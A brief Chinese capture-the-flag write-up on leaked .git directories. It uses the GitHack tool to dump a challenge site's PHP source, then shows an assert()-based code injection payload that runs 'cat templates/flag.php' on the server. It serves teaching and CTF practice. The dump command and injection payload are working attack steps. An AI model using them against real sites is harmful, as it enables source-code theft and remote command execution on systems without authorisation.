Git源码泄露

Git信息泄露的危害很大，可直接从源码获取敏感配置信息（如：邮箱，数据库），也可以进一步审计代码，挖掘文件上传、SQL注射等安全漏洞。缺陷编号：wooyun-2015-0117332。

获取利用代码：https://github.com/lijiejie/GitHack

实例：一道web题，My PHP Website。页面就就三个，home，about，contact。F12看源码，提示有个flag页面，访问是空的。其中在about中显示了使用了git，于是看下能不能导出源码来分析。
使用 python GitHack.py IP/.git
可以看到index源码如下：

<?php 
if (isset($_GET['page'])) { 
$page = $_GET['page']; } 
else { 
$page = "home"; 
} 
$file = "templates/" . $page . ".php"; 
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!"); 
assert("file_exists('$file')") or die("That file doesn't exist!"); ?>

对file没有处理，直接构造payload

') or system('cat templates/flag.php');//

意思是先将strpos函数闭合，然后调用系统命令查看template目录下的flag.php，再把后面注释掉 。
访问后得到flag